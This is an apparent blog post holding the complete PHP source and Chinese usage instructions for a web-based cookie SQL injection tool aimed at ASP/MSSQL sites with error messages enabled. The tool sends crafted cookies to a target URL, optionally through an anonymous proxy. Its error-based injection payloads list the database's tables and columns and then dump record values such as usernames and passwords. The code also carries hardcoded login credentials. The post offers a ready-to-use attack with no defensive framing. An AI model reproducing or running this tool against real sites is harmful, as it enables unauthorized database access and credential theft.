MSSQL错误提示开启下的 COOKIE注入辅助工具[web版] 
<?php
$auth_ok=0;
$user=$_SERVER['PHP_AUTH_USER'];
$pass=$_SERVER['PHP_AUTH_PW'];
if(isset($user) && isset($pass) && $user=='admin' && $pass=='mika520'){
$auth_ok=1;
}
if(!$auth_ok)
{
header('WWW-Authenticate: Basic realm="Top Secret Area"');
header('HTTP/1.0 401 Unauthorized');
exit;
}
$cookie=$_POST['_cookie'];
$referer=$_POST['_referer'];
$url=$_POST['_url'];
$t_name=$_POST['_tablename'];
$tab_name=$_POST['_tabname'];
$field_name=$_POST['_fieldname'];
$proxy=$_POST['_proxy'];
$useproxy=$_POST['_useproxy'];
$_action=$_POST['_action'];
$_btype=$_POST['_btype'];
?>
<html>
<head>
<title>Asp+Mssql Cookie Sql Injection Tool</title>
<style>body{font-family:trebuchet ms;font-size:16px;color:green;background-color:black}hr{width:100%;height:2px;}</style>
</head>
<body>
<center><h1>Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST]</h1></center>
<hr><hr>
<form action="<?=$_SERVER['PHP_SELF']?>" method="POST">
<center>
<table>
<tr><td><b>Exploitable Url: </b><input type="text" name="_url" size=60 value="<?=$url?>" /><?php if(isset($url) && empty($url)) echo "<font color=red>   unspecified</font>\n"?></td></tr>
<tr><td><b>Exploitable Cookie: </b><input type="text" name="_cookie" size=60 value="<?=$cookie?>" /><?php if(isset($cookie) && empty($cookie)) echo "<font color=red>   unspecified</font>\n"?></td></tr>
<tr><td><b>Referer Url: </b><input type="text" name="_referer" size=60 value="<?=$referer?>" /><?php if(isset($referer) && empty($referer)) echo "<font color=red>   unspecified</font>\n"?></td></tr>
<tr><td><input type="radio" name="_btype" value="num" <?php if (empty($_btype) || $_btype=="num") echo "checked";?>>Num Type</input>   <input type="radio" name="_btype" value="char" <?php if ($_btype=="char") echo "checked";?>>Char Type</input></td></tr>
<tr><td><input type="radio" name="_action" value="exp_tabs" <?php if(empty($_action) || $_action=="exp_tabs") echo "checked" ?> onclick="_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;">Explode Tables Of Current DataBase</input></td></tr>
<tr><td><input type="radio" name="_action" value="exp_fields" onclick="_tablename.disabled=false;_fieldname.disabled=true;_tabname.disabled=true;" <?php if($_action=="exp_fields") echo "checked"?>>Explode Fields Of   </input><input type="text" name="_tablename" size=30 value="<?php if(!empty($tab_name)) echo $tab_name; else echo $t_name;?>" <?php if($_action != "exp_fields") echo "disabled";?> /></td></tr>
<tr><td><input type="radio" name="_action" value="exp_values" onclick="_tablename.disabled=true;_fieldname.disabled=false;_tabname.disabled=false;" <?php if($_action=="exp_values") echo "checked"?>>Explode Values Of   </input><input type="text" name="_fieldname" size=30 value="<?=$field_name?>" <?php if($_action != "exp_values") echo "disabled";?>/> IN <input type="text" name='_tabname' size=20 value="<?php if(!empty($t_name)) echo $t_name; else echo $tab_name;?>" <?php if($_action != "exp_values") echo "disabled";?> /></td></tr><br>
<tr><td><input type="checkbox" name="_useproxy" value="use_proxy" onclick="javascript:if(this.checked==true){_proxy.disabled=false;}else {_proxy.disabled=true;}" <?php if(isset($useproxy) && !empty($proxy)) echo "checked";?>>Via Anonymous Proxy   <input type="text" name="_proxy" size=30 value="<?=$proxy?>" <?php if(empty($proxy)) echo "disabled=true";?> ></input></td></tr>
<tr><td><input type="submit" name="_submit" value="Launch Attack"></input><?php echo str_repeat(' ',50);?><input type="reset" name="_reset" value="Reset Attack"></input></td></tr>
</table>
</center>
</form>
<hr><hr>
<?php
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
global $curl,$referer,$cookie,$url,$table_name,$field_name,$t_name,$tab_name;
$tab_exp="%20and%201=(select%20top%201%20nchar(124)%2bname%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85)%20and%20name%20not%20in(MFM_TABLES))--";
$field_exp="%20and%20(select%20top%201%20nchar(124)%2Bcol_name(object_id(TABLE_NAME),MFM_NUM)%2Bnchar(124)%20from%20sysobjects)%3E0--";
$value_exp="%20and%20(select%20top%201%20nchar(124)%2Bcast(MFM_FIELD_NAME%20as%20varchar(8000))%2Bnchar(124)%20from%20MFM_TABLE_NAME%20where%20MFM_FIELD_NAME%20not%20in(MFM_VALUE))%3E0--";
$count_exp="%20and%20(select%20nchar(124)%2Bcast(%20count(*)%20as%20varchar(255))%2bnchar(124)%20from%20MFM_TABLE_NAME)%3E0--";
$count_table="%20and%201=(select%20top%201%20nchar(124)%2bcast(count(*)%20as%20varchar(8000))%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85))--";
$count_column="%20and%201=(select%20nchar(124)%2Bcast(count(*)%20as%20varchar(8000))%2Bnchar(124)%20from%20syscolumns%20where%20id=object_id(MFM_TABLE_NAME))--";
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
if(array_key_exists("_submit",$_POST) && !empty($url) && !empty($cookie) && !empty($referer)){
$bstr=$_POST['_btype'];
$action=$_POST['_action'];
echo "<div align=left><b>:::Attack Parameters:::</b><br>\n";
echo "<b>Target Url:</b><font color=blue>$url</font><br>\n";
echo "<b>Target Cookie:</b><font color=blue>\"$cookie\"</font><br>\n";
echo "<b>Referer Url:</b><font color=blue>$referer</font><br>\n";
echo "<b>Injection Type:</b>";
switch($bstr){
case 'num':
echo "<font color=blue>number</font><br>\n";
$bstr=0;//数字型
break;
case 'char':
echo "<font color=blue>character</font><br>\n";
$bstr=1;//字符型
break;
}
echo "<b>Via Proxy:</b>".((isset($useproxy) && !empty($proxy))? '<font color=blue>Yes</font>':'<font color=blue>No</font>')."<br>\n";
if(isset($useproxy) && !empty($proxy))
echo "<b>Proxy Address:</b><font color=blue>$proxy</font><br>\n";
echo "<b>Injection Action:</b>";
switch($action){
case 'exp_tabs':
echo "<font color=blue>Explode Table Names</font><br>\n</div>\n";
exploit_tab();
break;
case 'exp_fields':
echo "<font color=blue>Explode Table Fields</font><br>\n";
if(empty($t_name))
die("<font color=red>Error:table name must be specified!</font><br>");
$table_name=$t_name;
echo "<b>Table Name:</b><font color=blue>$table_name</font><br>\n</div>\n";
exploit_field();
break;
case 'exp_values':
echo "<font color=blue>Explode Table Values</font><br>\n";
if(empty($tab_name))
die("<font color=red>Error:table name must be specified!</font><br>");
elseif(empty($field_name))
die("<font color=red>Error:field name must be specified!</font><br>");
$table_name=$tab_name;
echo "<b>Table Name:</b><font color=blue>$table_name</font><br>\n";
echo "<b>Fields Name:</b><font color=blue>".str_replace(","," ",$field_name)."</font><br>\n</div>\n";
explode_value();
break;
}
}
//      exploit_tab();
//      exploit_field();
//      explode_value();
///////////////////////////////////////////////////////////////////////////////////////
function output_start()
{
echo "<hr><br>\n";
echo "<div align=center>\n";
echo "<table border=\"1\">\n";
flush();
}
function output_th($th)
{
switch($th){
case 'tr':
echo "<tr>";
break;
case '/tr':
echo "</tr>\n";
break;
default:
echo "<th><font color=blue>$th</font></th>\n";
break;
}
flush();
}
function output_td($td)
{
switch($td){
case 'tr':
echo "<tr>";
break;
case '/tr':
echo "</tr>\n";
break;
default:
echo "<td><font color=blue>$td</font></td>\n";
break;
}
flush();
}
function output_end()
{
echo "</table></div><br>\n";
flush();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段值函数
function explode_value()
{
global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl;
$i=1;
$count=0;
$fields=explode(",",$field_name);
$sql_str=" And (Select Top 1 nchar(124)";
$sub_str='+isNull(cast([MIKA_FIELD] as varchar(8000)),char(32))';
foreach($fields as $field){
$new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str);
$sql_str.=$new_sub_str."+char(92)";
}
$sql_str=substr($sql_str,0,strlen($sql_str)-9);
$sql_str.="+nchar(124) from (Select Top MIKA_NUM $field_name From [MIKA_TABLE] Where 1=1 Order by $field_name) T Order by ";
$sub_str="MIKA_FIELD desc";
foreach($fields as $field){
$sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str);
}
$sql_str.=implode(",",$sub_strs).")>0--";
//echo $sql_str."\n";
$sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str);
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
output_start();
$re=find_value($new_cookie);
if($re)
{
$count=$re;
echo "<b>the number of record in $table_name:</b> <font color=blue>$count</font>\n";
}
output_th('tr');
foreach ($fields as $field){
output_th($field);
}
output_th('/tr');
do{
$new_sql_str=str_replace('MIKA_NUM',$i,$sql_str);
//echo $sql_str."\n";
if($bstr)
$new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie);
$re=find_value($new_cookie);
output_td('tr');
if($re)
{
$res=explode("\\",$re);
foreach($res as $ree){
output_td($ree);
}
}
output_td('/tr');
$i++;
}while($i<=$count);
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//另一种方式暴取表名的函数
function explode_tab(){
global $bstr,$curl,$cookie;
$num=1;
$i=0;
$old_re="";
$re="";
$words=" And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--";
init_session();
output_th('tr');
for($i=0;$i<8;$i++)
output_th('Tables');
output_th('/tr');
output_td('tr');
do{
$new_words=str_replace('MIKA_NUM',$num,$words);
if($bstr)
$new_cookie=str_replace('MIKA',"%27".urlencode($new_words),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_words),$cookie);
$re=find_value($new_cookie);
if($re!=$old_re)
{
output_td($re);
if(($num % 8)==0)
{
output_td('/tr');
output_td('tr');
}
}
else
break;
$old_re=$re;
$num++;
}while($re);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//初始化会话函数
function init_session(){
global $proxy,$curl,$referer,$url;
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
if(isset($useproxy) && !empty($proxy))
curl_setopt($curl,CURLOPT_PROXY,"$proxy");
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//通用取值函数
function find_value($cookie){
global $curl;
//echo $cookie."\n";
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
//echo $content;
$re=preg_match("/(\|.+\|)/i",$content,$result);
if($re)
{
return str_replace('|','',$result[1]);
}
return 0;
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//字符串转换为msssql的16进制数值
function str2sqlhex($str){
$temp="0x";
for($i=0;$i<strlen($str);$i++){
//echo $str[$i]."\n";
$temp.=dechex(ord($str[$i]))."00";
}
//echo $temp."\n";
return $temp;
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取表名函数
function exploit_tab(){
global $bstr,$cookie,$tab_exp,$count_table,$curl;
$table=Null;
$temp=Null;
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$count_table,$cookie);
else
$new_cookie=str_replace('MIKA',$count_table,$cookie);
output_start();
if($re=find_value($new_cookie)){
echo "<b>Number of tables:</b><font color=blue>$re</font>\n";
}
/*do{
if($table==Null){
$new_url=str_replace('MFM_TABLES',"''",$tab_exp);
}
else{
$new_url=str_replace('MFM_TABLES',$temp,$tab_exp);
}
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
$re=find_value($new_cookie);
if($re)
{
$table=$re;
if($temp==Null){
//$temp="'".$table."'";
$temp=str2sqlhex($table);
}else{
//$temp.=","."'".$table."'";
$temp.=",".str2sqlhex($table);
}
fputs($table_file,"|------------+".$table."\n");
echo "|------------+".$table."\n";
}
}while($re);*/
explode_tab();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段函数
function exploit_field(){
global $bstr,$table_name,$cookie,$field_exp,$count_column,$curl;
$old_url=str_replace('TABLE_NAME',str2sqlhex($table_name),$field_exp);
$count_column=str_replace('MFM_TABLE_NAME',str2sqlhex($table_name),$count_column);
$num=1;
$i=0;
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$count_column,$cookie);
else
$new_cookie=str_replace('MIKA',$count_column,$cookie);
output_start();
if($re=find_value($new_cookie)){
echo "<b>Number of columns in $table_name:</b><font color=blue>$re</font>\n";
}
output_th('tr');
for($i=0;$i<4;$i++)
output_th('Fields');
output_th('/tr');
output_td('tr');
do{
$temp=$old_url;
$new_url=str_replace('MFM_NUM',"$num",$temp);
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
//echo $new_url."\n";
$re=find_value($new_cookie);
if($re){
output_td($re);
if(($num % 4)==0)
{
output_td('/tr');
output_td('tr');
}
}
$num++;
}while($re);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//老方式暴取字段值的函数
function exploit_value(){
global $bstr,$table_name,$field_name,$cookie,$value_exp,$count_exp,$curl;
$value=Null;
$temp=Null;
$count_num=1;
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
$re=find_value($new_cookie);
$record_file=fopen("records-$field_name.txt","w");
if($re)
{
$count=$re;
echo "the number of record in $table_name is: $count\n";
fputs($record_file,"the number of record in $table_name is: $count\n");
}
$old=str_replace('MFM_FIELD_NAME',$field_name,$value_exp);
$old=str_replace('MFM_TABLE_NAME',$table_name,$old);
//echo $old."\n";
do{
if($value==Null){
$new_url=str_replace('MFM_VALUE',"''",$old);
}
else{
$new_url=str_replace('MFM_VALUE',$temp,$old);
}
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
$re=find_value($new_cookie);
if($re)
{
$value=$re;
echo "|------------+ ".$value."\n";
fputs($record_file,"|------------+ ".$value."\n");
if($temp==Null){
//$temp="'".urlencode($value)."'";
//$temp=urlencode("'".urlencode($value)."'");
$temp=str2sqlhex($value);
//echo $temp."\n";
}else{
//$temp.=","."'".urlencode($value)."'";
//$temp.=",".urlencode("'".urlencode($value)."'");
$temp.=",".str2sqlhex($value);
}
}else{echo "|------------+ None\n";
fputs($record_file,"|------------+ None\n");}
$count_num++;
}while($count_num<=$count);
fclose($record_file);
}
///////////////////////////////////////////////////////////////////////////////////////
?>
<?php
if(!array_key_exists('_submit',$_POST)){
?>
<center><h2><font color=blue>cookie注入辅助工具 by mika[EST]</font></h2></center><br>
<div align=center>
<font color=red>只针对mssql数据库,且错误提示开启。</font><br>
<font color=blue>用法非常简单:</font><br>
<font color=blue>首先将实际获得cookie填入"exploitable cookie"栏里。并将可注入的字段后面加上MIKA这
个关键字,如下例所示,不要有空格。比如下面这个cookie:</font><br>
<font color=red>"my web=myset=template; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"</font><br>
<font color=blue>其中myset这个字段没有过滤好,存在注入漏洞,那么你就需要在template后面加上MIKA这个关键字
因此$cookie全局变量就成了如下这个样子:</font><br>
<font color=red>$cookie="my web=myset=templateMIKA; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL";</font><br>
<font color=blue>"Exploitable Url"填存在漏洞的页面url地址。"referer url"填写http头里的referer字段的内容,一般情况下跟"Exploitable Url"
一样就可以了。
</font><br>
<font color=blue>"Num Type"和"Char Type"是注入的类型,前者代表数值型,后者代表字符型,根据实际情况填写即可。<br>
"Explode Tables Of Current DataBase" 爆取当前数据库的所有表名。<br>
"Explode Fields Of" 爆取某个表的字段值,后面填上要暴取字段的表名.<br>
"Explode Values Of" 暴取某个表的字段值。后面两个文本框,从左到又依次填写字段名和表名。其中字段数可以一次填写多个,以逗号(",")隔开,比如:<br>
<font color=red>username,password,userid</font><br>
"Via Anonymous Proxy" 是选择是否使用匿名HTTP代理,代理地址格式为"127.0.0.1:8080".<br>
</font>
<font color=red>by mika[EST]</font><br>
</div>
<?php
}
?>
</body>
</html>
posted on 2007-09-26 19:23  %5C  阅读(957)  评论(0编辑  收藏  举报
Copyright © 2024 %5C
Powered by .NET 9.0 on Kubernetes Powered By: 博客园